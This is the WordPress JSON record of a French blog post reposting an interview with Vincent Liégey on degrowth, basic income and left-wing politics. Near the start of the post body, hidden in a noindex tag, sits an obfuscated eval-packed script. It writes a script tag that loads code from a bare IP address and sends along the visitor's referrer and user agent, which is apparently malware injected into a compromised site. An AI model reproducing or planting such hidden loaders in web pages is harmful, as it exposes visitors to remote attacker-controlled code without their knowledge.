{"id":9020,"date":"2014-12-10T09:50:58","date_gmt":"2014-12-10T08:50:58","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9020"},"modified":"2014-12-10T09:54:07","modified_gmt":"2014-12-10T08:54:07","slug":"la-decroissance-sinscrit-dans-une-tradition-politique-de-gauche","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9020","title":{"rendered":"\u00ab La d\u00e9croissance s\u2019inscrit dans une tradition politique de gauche \u00bb"},"content":{"rendered":"<p><b><a href=\"http:\/\/comptoir.org\/2014\/12\/08\/vincent-liegey-la-decroissance-sinscrit-dans-une-tradition-politique-de-gauche\/\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/comptoirdotorg.files.wordpress.com\/2014\/09\/le_comptoir_rouge.jpg?w=250&amp;h=340\" alt=\"\" width=\"139\" height=\"189\" \/><\/a>Interview <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fntza|var|u0026u|referrer|kkdsk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> r\u00e9alis\u00e9 par <a href=\"http:\/\/comptoir.org\/2014\/12\/08\/vincent-liegey-la-decroissance-sinscrit-dans-une-tradition-politique-de-gauche\/\" target=\"_blank\">Le Comptoir<\/a> avec l&rsquo;objecteur de croissance et militant politique, Vincent Liegey, membre et porte-parole du <a href=\"http:\/\/www.partipourladecroissance.net\/\" target=\"_blank\">Parti pour la d\u00e9croissance<\/a> (PPLD) depuis 2008. <\/b><b>Il est co-auteur d\u2019un livre intitul\u00e9 \u00ab\u00a0Un projet de d\u00e9croissance. Manifeste pour une dotation inconditionnelle d\u2019autonomie\u00a0\u00bb (Utopia) paru en 2013. Nous avons souhait\u00e9 le rencontrer afin de discuter avec lui de \u00ab\u00a0d\u00e9croissance\u00a0\u00bb, concept qui selon son parti \u00ab\u00a0remet avant tout en question notre soci\u00e9t\u00e9 de consommation sans hypoth\u00e9quer nos acquis d\u00e9mocratiques, sociaux et culturels\u00a0\u00bb.<\/b><\/p>\n<h4>Le Comptoir : Quel projet la d\u00e9croissance propose-t-elle pour la soci\u00e9t\u00e9\u00a0?<\/h4>\n<p><strong>Vincent Li\u00e9gey<\/strong> : La d\u00e9croissance, avant d\u2019\u00eatre un projet, est un outil s\u00e9mantique qui a pour objectif d\u2019ouvrir des d\u00e9bats de soci\u00e9t\u00e9 sur le fait qu\u2019une croissance infinie dans un monde fini est d\u2019une part impossible, pour des <a href=\"https:\/\/www.youtube.com\/watch?v=a0J2gj80EVI\" target=\"_blank\">raisons physiques, \u00e9nerg\u00e9tiques<\/a> et \u00e9cologiques \u00e9videntes, et d\u2019autre part non souhaitable. En effet, nous vivons dans une soci\u00e9t\u00e9 domin\u00e9e par la religion de la croissance et nous devons poser la question du sens : qu\u2019est-ce qu\u2019on produit, comment et pour quel usage ? La croissance pour la croissance nous rend-elle vraiment heureux ?<\/p>\n<p>\u00c0 partir de ce rejet, on peut ouvrir des portes et commencer \u00e0 discuter de ce qui serait souhaitable de construire ensemble.\u00a0Ainsi, la d\u00e9croissance est une matrice de r\u00e9flexions, d\u2019exp\u00e9rimentations et de propositions susceptibles d\u2019amorcer des transitions d\u00e9mocratiques et sereines vers de nouveaux mod\u00e8les de soci\u00e9t\u00e9s \u00e0 inventer, cr\u00e9er, exp\u00e9rimenter et construire qui seraient \u00e0 la fois soutenables mais surtout d\u00e9sirables, conviviaux et autonomes.<!--more--><\/p>\n<p>Loin d\u2019\u00eatre un projet cl\u00e9 en main, nous mettons toutefois en avant un certain nombre de propositions qui nous semblent pertinentes et que nous avons d\u00e9velopp\u00e9es dans notre ouvrage collectif \u00ab\u00a0<em><a href=\"http:\/\/www.projet-decroissance.net\/\" target=\"_blank\">Un projet de d\u00e9croissance<\/a>\u00a0<\/em>\u00bb. En particulier, nous proposons la mise en place d\u2019une <a href=\"http:\/\/www.projet-decroissance.net\/?p=1571\" target=\"_blank\">dotation inconditionnelle d\u2019autonomie<\/a> (DIA). Elle consiste \u00e0 donner, de la naissance \u00e0 la mort, de mani\u00e8re inconditionnelle, ce que l\u2019on consid\u00e8re d\u00e9mocratiquement comme n\u00e9cessaire pour avoir une vie frugale et d\u00e9cente. La DIA est constitu\u00e9e de droits de tirage sur des ressources (gratuit\u00e9 du bon usage de l\u2019eau, des \u00e9nergies), d\u2019acc\u00e8s \u00e0 des services (sant\u00e9, \u00e9cole, pompes fun\u00e8bres, transport) en questionnant le sens de ceux-ci et aussi de monnaies notamment locales pour acheter nourriture, outils et v\u00eatements.<\/p>\n<blockquote><p>\u00ab <strong><em>La d\u00e9croissance en tant que rejet et projet rencontre d\u00e9j\u00e0 une adh\u00e9sion tr\u00e8s large aussi bien en France que dans l\u2019ensemble des soci\u00e9t\u00e9s occidentales, y compris dans les classes populaires, et aussi dans les pays du Sud.<\/em><\/strong>\u00a0\u00bb<\/p><\/blockquote>\n<p>La DIA est un outil de transition susceptible de <a href=\"http:\/\/www.projet-decroissance.net\/?page_id=399\" target=\"_blank\">repolitiser la soci\u00e9t\u00e9 et de resocialiser la politique<\/a> en nous r\u00e9appropriant le sens de nos vies et de nos activit\u00e9s. Cette DIA est coupl\u00e9e \u00e0 d\u2019autres mesures, en particulier la mise en place d\u2019un revenu maximum acceptable, la sortie de la \u00ab religion de l\u2019\u00e9conomie \u00bb\u00a0\u00e0 travers la r\u00e9appropriation d\u00e9mocratique des banques centrales, de la cr\u00e9ation mon\u00e9taire et une r\u00e9flexion sur le non-remboursement des dettes publiques ill\u00e9gitimes. On peut aussi ajouter nos r\u00e9flexions sur le rejet de la publicit\u00e9, outil central de colonisation de nos imaginaires, du complexe militaro-industriel, de l\u2019obsolescence programm\u00e9e ou encore des gadgets.<\/p>\n<p><a href=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-1979\" src=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/1.jpg?w=526&amp;h=311\" alt=\"\" width=\"526\" height=\"311\" \/><\/a><\/p>\n<h4>La d\u00e9croissance peut-elle \u00eatre \u00e0 elle seule un projet politique rencontrant l\u2019adh\u00e9sion des Fran\u00e7ais et en particulier des classes populaires\u00a0?<\/h4>\n<p>Nous pensons que la d\u00e9croissance en tant que rejet et projet rencontre d\u00e9j\u00e0 une adh\u00e9sion tr\u00e8s large aussi bien en France que dans l\u2019ensemble des soci\u00e9t\u00e9s occidentales, y compris dans les classes populaires, et aussi dans les pays du Sud. On l\u2019observe \u00e0 travers un rejet toujours plus grand de ce monde mortif\u00e8re de la consommation, de la comp\u00e9tition ou encore le rejet de la politique institutionnalis\u00e9e (le premier parti d\u2019Europe est l\u2019abstention). Ce rejet est la cons\u00e9quence d\u2019un mal-\u00eatre grandissant li\u00e9 \u00e0 des in\u00e9galit\u00e9s insupportables et aussi \u00e0 une perte de sens.<\/p>\n<p><a href=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/projet-dc3a9croissance.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"  alignright wp-image-1921\" src=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/projet-dc3a9croissance.jpg?w=326&amp;h=531\" alt=\"\" width=\"326\" height=\"531\" \/><\/a>Toutefois, la question du chemin reste la plus d\u00e9licate. Si des id\u00e9es de bon sens comme la <a href=\"http:\/\/fr.wikipedia.org\/wiki\/D%C3%A9veloppement_durable\" target=\"_blank\">soutenabilit\u00e9<\/a>, la relocalisation ouverte, le partage, la solidarit\u00e9, la simplicit\u00e9 sont partag\u00e9es par beaucoup d\u2019entre nous, les diffuser de mani\u00e8re coh\u00e9rente n\u2019est pas simple. Ce sont les r\u00e9flexions qui nous animent autour de strat\u00e9gies de transformation : en particulier autour de nos r\u00e9flexions sur comment changer la soci\u00e9t\u00e9 sans prendre le pouvoir (car si on le prend, on est pris par lui) et donc la construction d\u2019une masse critique. Ainsi la d\u00e9croissance s\u2019appuie sur quatre niveaux d\u2019action : le\u00a0collectif\u00a0\u00e0 travers les alternatives concr\u00e8tes, le\u00a0projet\u00a0avec un projet de transition et aussi une r\u00e9flexion sur ce que peuvent \u00eatre des soci\u00e9t\u00e9s de d\u00e9croissance, la\u00a0visibilit\u00e9\u00a0comprenant l\u2019organisation de rencontres-d\u00e9bats, de manifestations, le passage dans les m\u00e9dias, la participation \u00e0 des \u00e9lections de mani\u00e8re non-\u00e9lectoraliste, et le\u00a0niveau individuel\u00a0\u00e0 travers la simplicit\u00e9 volontaire et la d\u00e9colonisation de l\u2019imaginaire.<\/p>\n<p>L\u2019enjeu, en allant bien au-del\u00e0 de notre mouvement, en d\u00e9colonisant notre imaginaire centralisateur, est de construire des convergences et des dynamiques susceptibles de nous r\u00e9approprier le sens que l\u2019on souhaite donner \u00e0 nos vies. De m\u00eame, la question d\u2019ouvrir ce d\u00e9bat au-del\u00e0 de nos r\u00e9seaux militants nous interpelle. En particulier ouvrir du dialogue avec les classes populaires est fondamental m\u00eame si pas \u00e9vident.<\/p>\n<h4>Pourquoi s\u2019inscrire dans la logique partisane qui emp\u00eache de penser hors des cadres institutionnels politiques ? Pour remettre en cause le dogme de la croissance, ne faut-il pas agir en dehors des cadres ayant favoris\u00e9 et promu ce dogme ?<\/h4>\n<p>C\u2019est vraiment l\u00e0 l\u2019une des plus grosses contradictions que nous devons appr\u00e9hender. Nous vivons dans ce mod\u00e8le de soci\u00e9t\u00e9 que nous n\u2019avons pas choisi et que nous rejetons. Mais qu\u2019on le veuille ou non, nous en sommes impr\u00e9gn\u00e9s, aussi bien psychologiquement que socialement, culturellement qu\u2019institutionnellement. Nous en d\u00e9pendons aussi.<\/p>\n<p>L\u2019enjeu est donc, dans une logique de transition, de partir de la soci\u00e9t\u00e9 telle qu\u2019elle est et de tendre vers de nouveaux mod\u00e8les \u00e9tape par \u00e9tape sur diff\u00e9rents niveaux. D\u2019o\u00f9 l\u2019importance et la coh\u00e9rence de ne pas s\u2019inscrire dans une logique partisane ou centralisatrice du syst\u00e8me mais, au contraire, de cultiver la diversit\u00e9 et la compl\u00e9mentarit\u00e9 des approches, des strat\u00e9gies, des propositions et des exp\u00e9rimentations, plus ou moins en rupture avec le syst\u00e8me. Ainsi, j\u2019\u00e9crivais pour pr\u00e9parer <a href=\"http:\/\/www.projet-decroissance.net\/?p=1860\" target=\"_blank\">les rencontres de <em>Reporterre<\/em><\/a> du 6 octobre dernier :<br \/>\n\u00ab\u00a0<em>Comment cr\u00e9er un r\u00e9seau horizontal de collectifs, mouvements, partis, suffisamment ouvert pour \u00e9viter que l\u2019on s\u2019y \u00e9touffe par manque de libert\u00e9 d\u2019exp\u00e9rimenter et suffisamment coh\u00e9rent, solidaire et visible pour faire pression sur les pouvoirs d\u00e9cisionnels et r\u00e9sister face \u00e0 l\u2019oligarchie\u00a0?<\/em><\/p>\n<p><em>De m\u00eame, comment repenser notre rapport au pouvoir pour \u00e9viter les path\u00e9tiques et destructeurs combats d\u2019\u00e9gos et de chapelles\u00a0? Comment changer la soci\u00e9t\u00e9 sans prendre le pouvoir\u2026 ni le donner\u00a0?<br \/>\n<\/em><em>Cela passe par plus d\u2019ouverture d\u2019esprit, prendre le temps du dialogue, s\u2019\u00e9couter, sortir de ses dogmes, ses jargons, mais aussi faire preuve d\u2019humilit\u00e9 et de patience, assumer cette dissonance et le fait que nous faisons face \u00e0 des challenges gigantesques et que la recette magique n\u2019existe pas\u00a0!<\/em>\u00a0\u00bb<\/p>\n<h4>Que pensez-vous des strat\u00e9gies d\u2019entrisme dans les partis traditionnels, \u00e0 l\u2019image de ce que pratique<a href=\"http:\/\/biosphere.blog.lemonde.fr\/2010\/08\/18\/la-decroissance-selon-yves-cochet\/\" target=\"_blank\">Yves Cochet<\/a> chez Europe \u00c9cologie-Les Verts (EE-LV) ?<\/h4>\n<p>Je pense que d\u2019une part, <strong>Yves Cochet<\/strong> n\u2019est pas dans une logique d\u2019entrisme \u00e0 EE-LV puisqu\u2019il est l\u2019un des fondateurs de ce mouvement. D\u2019autre part, les logiques d\u2019entrisme appartiennent \u00e0 l\u2019ancien monde, celui du pouvoir, des combats de chapelles, des logiques d\u2019appareil. Ce monde est en train de s\u2019\u00e9teindre et la transformation de la soci\u00e9t\u00e9 passera par le d\u00e9passement des ses cadres. Toutefois, il est souhaitable de coop\u00e9rer avec des personnes comme Yves Cochet, qui font un travail remarquable et compl\u00e9mentaire dans le cadre des institutions. Ils servent aussi de relais pour nos id\u00e9es comme par exemple son rapport en tant que d\u00e9put\u00e9 europ\u00e9en, \u00ab\u00a0<a href=\"http:\/\/www.greens-efa.eu\/fileadmin\/dam\/Documents\/Events\/17_10_2013_Feeding_Europe\/PE-Nourrir_A4_web_22112013.pdf\" target=\"_blank\">Nourrir l\u2019Europe en temps de crise<\/a>\u00a0\u00bb. La transformation de la soci\u00e9t\u00e9 ne viendra pas d\u2019en haut. Mais elle ne se fera pas non plus sans soutien d\u2019en haut, non pas pour faire \u00e0 notre place mais pour nous laisser nous r\u00e9approprier la loi, l\u2019argent public et les communs qui sont aujourd\u2019hui dans les mains de l\u2019oligarchie financi\u00e8re. Toute avanc\u00e9e de nos r\u00e9flexions, id\u00e9es, propositions dans n\u2019importe quelle sph\u00e8re de la soci\u00e9t\u00e9 est un espoir susceptible de r\u00e9duire les violences d\u00e9j\u00e0 en marche ou \u00e0 venir. L\u2019enjeu n\u2019est pas l\u2019entrisme, mais d\u2019essayer de mettre sur la table les questions et les id\u00e9es qui nous semblent pertinentes.<\/p>\n<blockquote><p>\u00ab <strong><em>L\u2019enjeu est trouver les bons \u00e9quilibres et susciter du dialogue non-violent.<\/em><\/strong>\u00a0\u00bb<\/p><\/blockquote>\n<h4>Vous avez d\u00e9cid\u00e9 de fonder un parti politique, or de nombreux d\u00e9croissants ou pr\u00e9curseurs de la d\u00e9croissance tels que <a href=\"http:\/\/www.causeur.fr\/simone-weil-prophete-pour-notre-temps-26164.html\" target=\"_blank\">Simone Weil<\/a> ou <a href=\"https:\/\/infokiosques.net\/imprimersans2.php3?id_article=156\" target=\"_blank\">Corn\u00e9lius Castoriadis<\/a> critiquent les partis comme \u00e9tant\u00a0par nature anti-d\u00e9mocratiques. Le parti serait par essence bureaucratique et s\u2019opposerait \u00e0 une forme de d\u00e9mocratie directe. Qu\u2019en pensez-vous ?<\/h4>\n<p>Comme l\u2019expliquons dans le communiqu\u00e9 de notre derni\u00e8re rencontre, nous avons h\u00e9rit\u00e9 d\u2019un parti cr\u00e9\u00e9 il y a une dizaine d\u2019ann\u00e9es et qui a toujours fait d\u00e9bat. Apr\u00e8s de longues discussions, nous conservons cette entit\u00e9 qui est <a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=7567\" target=\"_blank\">dor\u00e9navant devenue un collectif autog\u00e9r\u00e9<\/a>. Toutefois, cet outil, nous permet de faire avancer nos id\u00e9es dans des milieux autres comme les institutions, les partis et mouvements politiques.<\/p>\n<p>\u00ab\u00a0<em>Nous \u00e9tions dans un parti et avons su le transformer en collectif \u00e0 travers nos r\u00e9flexions, \u00e9changes et notre mode de fonctionnement artisanal, collectif, horizontal, cog\u00e9r\u00e9 et surtout convivial.<br \/>\n<\/em><em>Avec humilit\u00e9, humour et auto-critique, nous essayons de colporter avec coh\u00e9rence les id\u00e9es de la d\u00e9croissance, ses projets, ses programmes, ses chemins, ses m\u00e9thodes\u2026 dans le respect de nos diversit\u00e9s. <a href=\"http:\/\/www.reporterre.net\/spip.php?article3806\" target=\"_blank\">La transition est en marche<\/a>\u00a0et nous sommes donc bel et bien parti-e-s pour la d\u00e9croissance.<\/em>\u00a0\u00bb<\/p>\n<h4>Gauche et droite ont depuis l\u2019apr\u00e8s-guerre march\u00e9 de pair pour promouvoir la croissance. Votre parti d\u00e9passe-t-il le traditionnel clivage gauche-droite\u00a0?<\/h4>\n<p>La d\u00e9croissance, comme nous le pr\u00e9cisons <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7954\" target=\"_blank\">dans un ouvrage collectif<\/a>, s\u2019inscrit dans une tradition politique de gauche puisque nous sommes anim\u00e9s par une volont\u00e9 de justice sociale et environnementale et aussi d\u2019\u00e9mancipation en nous appuyant sur la d\u00e9mocratie, la non-violence et le rejet de toutes id\u00e9ologies racistes ou x\u00e9nophobes.\u00a0Toutefois, oui, le d\u00e9passement de ce clivage pose question, d\u2019autant plus que les gauches au pouvoir, du moins celles et ceux qui s\u2019en sont revendiqu\u00e9s ont souvent failli ou trahi. Nous faisons face \u00e0 l\u2019effondrement de notre civilisation occidentale. Les pas de c\u00f4t\u00e9 sont n\u00e9cessaire, les rep\u00e8res id\u00e9ologiques aussi. L\u2019enjeu est de trouver les bons \u00e9quilibres et susciter du dialogue non-violent.<\/p>\n<h4>Que pensez-vous des mouvements de protestation comme <a href=\"http:\/\/lutteaeroportnddl.com\/\" target=\"_blank\">Notre-Dame-des-Landes<\/a> ?<\/h4>\n<p><a href=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/14.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"  alignright wp-image-1983\" src=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/14.jpg?w=283&amp;h=281\" alt=\"1\" width=\"283\" height=\"281\" \/><\/a>Nous sommes actifs et solidaires avec \u00e0 la fois les mouvements de r\u00e9sistance contre les <a href=\"http:\/\/www.reporterre.net\/spip.php?article5648\" target=\"_blank\">grands projets inutiles impos\u00e9s<\/a> (GPII) et aussi les exp\u00e9rimentations formidables mais dures qui voient le jour sur les <a href=\"http:\/\/zad.nadir.org\/\" target=\"_blank\">zones \u00e0 d\u00e9fendre<\/a> (ZAD).\u00a0Ces lieux, comme Notre-Dame-Des-Landes, sont symboliques de ces deux mondes qui se c\u00f4toient dans nos soci\u00e9t\u00e9s. D\u2019un c\u00f4t\u00e9, une \u00e9lite oligarchique m\u00e9prisante, enferm\u00e9e dans sa religion de la croissance qui impose avec violence des projets d\u2019un autre temps et, de l\u2019autre, ces nouveaux mondes autonomes, soutenables,<a href=\"http:\/\/www.projet-decroissance.net\/?p=1889\" target=\"_blank\">non-violents<\/a> qui voient le jour. Ces lieux sont d\u2019excellents espaces d\u2019exp\u00e9rimentation, de r\u00e9appropriation de la d\u00e9mocratie et des questionnements sur la mani\u00e8re de g\u00e9rer les communs, sur ce qu\u2019on produit, comment et pour quel usage ?<\/p>\n<blockquote><p>\u00ab <em><strong>Nous sommes donc enti\u00e8rement favorables au revenu d\u2019existence, \u00e0 condition qu\u2019il s\u2019inscrive dans un projet de soci\u00e9t\u00e9.\u00a0<\/strong><\/em>\u00bb<\/p><\/blockquote>\n<h4>Pourquoi soutenir le projet\u00a0du revenu universel dans une optique d\u00e9croissante ?<\/h4>\n<p>Nous sommes favorables \u00e0 un revenu de base inconditionnel pour des raisons de justice sociale parce qu\u2019il permettrait de r\u00e9duire les souffrances toujours plus terribles li\u00e9es aux in\u00e9galit\u00e9s et aux plans d\u2019aust\u00e9rit\u00e9. Nous y sommes \u00e9galement favorables car c\u2019est un outil pour se d\u00e9sali\u00e9ner de l\u2019emploi contraint et sortir de la centralit\u00e9 de la valeur travail.\u00a0En revanche,\u00a0on est tr\u00e8s prudent, car si une telle mesure est mise en place sans avoir en parall\u00e8le une r\u00e9flexion sur le sens de nos productions, de nos consommations ou encore sur la place tr\u00e8s importante de la publicit\u00e9 dans nos soci\u00e9t\u00e9s, \u00e7a risque de d\u00e9boucher sur quelque chose d\u2019assez inqui\u00e9tant o\u00f9 on relance la consommation de choses pas vraiment utiles. Et puis le revenu d\u2019existence, dans la version de <a href=\"http:\/\/fr.wikipedia.org\/wiki\/Milton_Friedman\" target=\"_blank\">Milton Friedman<\/a>, pourrait aussi d\u00e9boucher sur la destruction d\u2019un certain nombre de minima sociaux, de protections ou encore la remise en question du droit du travail.<\/p>\n<p>Nous sommes donc enti\u00e8rement favorables au revenu d\u2019existence, \u00e0 condition qu\u2019il s\u2019inscrive dans un projet de soci\u00e9t\u00e9, une r\u00e9flexion beaucoup plus large autour d\u2019une transition vers de nouveaux mod\u00e8les \u00e9conomiques, locaux, alternatifs, qui prennent en compte les questions environnementales et ce questionnement qui est au centre de nos r\u00e9flexions : qu\u2019est-ce qu\u2019on produit\u00a0? Comment\u00a0? Pour quel usage\u00a0? Et aussi, chose importante, \u00e0 condition qu\u2019il soit coupl\u00e9 \u00e0 revenu maximum acceptable.<\/p>\n<p><a href=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/ppld.jpg\"><img decoding=\"async\" class=\"aligncenter wp-image-1922 size-large\" src=\"https:\/\/comptoirdotorg.files.wordpress.com\/2014\/12\/ppld.jpg?w=1024&amp;h=594\" alt=\"PPLD\" \/><\/a><\/p>\n<h4>Comment organise-t-on notre d\u00e9croissance \u00e0 nous, pays occidentaux, en m\u00eame temps que la croissance des pays du tiers-monde ?<\/h4>\n<p>La r\u00e9appropriation de l\u2019autod\u00e9termination des pays du \u00ab\u00a0tiers-monde\u00a0\u00bb ne peut passer que par la d\u00e9croissance de la consommation dans les pays occidentaux. Nous sommes aujourd\u2019hui 20% \u00e0 nous approprier 87 % des ressources de la plan\u00e8te, qui plus est avec des empreintes \u00e9cologiques ni soutenables, ni g\u00e9n\u00e9ralisables (il faudrait entre 3 et 7 plan\u00e8tes pour soutenir nos surconsommations). Cela contraint nos soci\u00e9t\u00e9s \u00e0 entretenir un complexe militaro-industriel important, \u00e0 nous engager dans des guerres imp\u00e9rialistes meurtri\u00e8res et ill\u00e9gales, tr\u00e8s souvent au nom d\u2019arguments fallacieux comme la lutte contre le terrorisme, ou encore de nous appuyer sur des outils \u00e9conomiques de domination comme la dette et ses institutions \u00e9conomiques imp\u00e9rialistes comme le FMI\u00a0ou l\u2019OMC.<\/p>\n<p>Nous devons donc commencer \u00e0 r\u00e9duire notre d\u00e9pendance \u00e0 l\u2019assistance technique venant du sud et rompre avec l\u2019escalade guerri\u00e8re que l\u2019on observe depuis le 11 septembre 2001, notamment dans le but de contr\u00f4ler les r\u00e9gions strat\u00e9giques pour les \u00e9nergies fossiles.\u00a0L\u00e0 aussi, les d\u00e9croissants pr\u00f4nent un dialogue des civilisations dans une logique de transition et de respect de la diversit\u00e9 des cultures et des modes de vie, bien loin de l\u2019imposture imp\u00e9rialiste du d\u00e9veloppement.<\/p>\n<h4>\u00catre d\u00e9croissant, est-ce sortir totalement du dogme de la croissance ou est-ce s\u2019adapter \u00e0 la pause actuelle de la croissance \u00e9conomique ?<\/h4>\n<p>\u00catre d\u00e9croissant c\u2019est faire le choix de la d\u00e9mocratie, de la non-violence, du dialogue, de la d\u00e9colonisation de nos imaginaires, de la simplicit\u00e9 volontaire, de l\u2019abondance frugale face \u00e0 l\u2019effondrement violent de la soci\u00e9t\u00e9 occidentale. L\u2019enjeu est entre d\u00e9croissance choisie ou r\u00e9cession subie, donc entre d\u00e9croissance ou barbarie. Il n\u2019y a pas un chemin pour sortir de cette impasse mais une diversit\u00e9 de r\u00e9flexions, d\u00e9bats, d\u00e9constructions, exp\u00e9rimentations, propositions et strat\u00e9gies dans le but de nous r\u00e9approprier de l\u2019espoir dans un monde mortif\u00e8re.<\/p>\n<h2><iframe loading=\"lazy\" class=\"youtube-player\" src=\"http:\/\/www.youtube.com\/embed\/LXdPEBA7tfw?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent\" width=\"524\" height=\"262\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\" data-ratio=\"0.5887931034482758\" data-width=\"1160\" data-height=\"683\"><\/iframe><\/h2>\n<h2><strong>Nos Desserts :<\/strong><\/h2>\n<ul>\n<li>Le <a href=\"https:\/\/twitter.com\/VinczeDegrowth\" target=\"_blank\">Twitter<\/a> de Vincent Liegey et son <a href=\"http:\/\/www.facebook.com\/vincent.liegey\" target=\"_blank\">Facebook<\/a><\/li>\n<li>Le livre\u00a0<a href=\"http:\/\/www.projet-decroissance.net\/?page_id=41\" target=\"_blank\"><em>Un projet de d\u00e9croissance<\/em><\/a><\/li>\n<li><a href=\"http:\/\/degrowth.org\/\" target=\"_blank\">Le collectif Recherche et d\u00e9croissance<\/a><\/li>\n<li><a href=\"http:\/\/cyclonomia.org\/cyclonomia-en-francais\/\" target=\"_blank\">Centre de recherche et d\u2019exp\u00e9rimentation sur la d\u00e9croissance et la transition<\/a><\/li>\n<li>Interview de Serge Latouche, principal th\u00e9oricien de la d\u00e9croissance, sur <em><a href=\"http:\/\/limpertinent93.wordpress.com\/2014\/01\/01\/serge-latouche-la-croissance-est-morte-dans-les-annees-1970\/\" target=\"_blank\">L\u2019Entreprise de L\u2019Impertinence<\/a><\/em><\/li>\n<li><em>Un revenu universel pour sortir du capitalisme ?\u00a0<\/em>sur <em><a href=\"http:\/\/limpertinent93.wordpress.com\/2014\/02\/25\/un-revenu-universel-pour-en-finir-avec-le-capitalisme\/\" target=\"_blank\">L\u2019Entreprise de L\u2019Impertinence<\/a><\/em><\/li>\n<li>L\u2019int\u00e9gralit\u00e9 de\u00a0<em><a href=\"http:\/\/classiques.uqac.ca\/contemporains\/georgescu_roegen_nicolas\/decroissance\/decroissance.html\" target=\"_blank\">Entropie-\u00c9cologie-<\/a><a href=\"http:\/\/classiques.uqac.ca\/contemporains\/georgescu_roegen_nicolas\/decroissance\/decroissance.html\" target=\"_blank\">\u00c9<\/a><a href=\"http:\/\/classiques.uqac.ca\/contemporains\/georgescu_roegen_nicolas\/decroissance\/decroissance.html\" target=\"_blank\">conomie<\/a>\u00a0<\/em>de Nicholas Georgescu-Roegen, pionnier de\u00a0la d\u00e9croissance<\/li>\n<li><a href=\"http:\/\/www.persee.fr\/web\/revues\/home\/prescript\/article\/homso_0018-4306_1987_num_84_2_2296\" target=\"_blank\"><em>Faut-il refuser le d\u00e9veloppement ? Essai sur l\u2019anti-\u00e9conomique du tiers-monde<\/em> <\/a>de Serge Latouche<\/li>\n<li>Aur\u00e9lien Bernier parlait de d\u00e9croissance dans <em><a href=\"http:\/\/comptoir.org\/2014\/11\/10\/aurelien-bernier-les-classes-populaires-se-sentent-profondement-trahies-par-la-gauche\/\" target=\"_blank\">Le Comptoir<\/a><\/em><\/li>\n<\/ul>\n<p><a href=\"http:\/\/comptoir.org\/2014\/12\/08\/vincent-liegey-la-decroissance-sinscrit-dans-une-tradition-politique-de-gauche\/\" target=\"_blank\">Le Comptoir, le 8 d\u00e9cembre 2014<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Interview r\u00e9alis\u00e9 par Le Comptoir avec l&rsquo;objecteur de croissance et militant politique, Vincent Liegey, membre et porte-parole du Parti pour la d\u00e9croissance (PPLD) depuis 2008. Il est co-auteur d\u2019un livre intitul\u00e9 \u00ab\u00a0Un projet de d\u00e9croissance. Manifeste pour une dotation inconditionnelle &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9020\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,17],"tags":[],"class_list":["post-9020","post","type-post","status-publish","format-standard","hentry","category-actualites","category-revue-de-medias"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9020","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9020"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9020\/revisions"}],"predecessor-version":[{"id":9023,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9020\/revisions\/9023"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9020"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9020"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}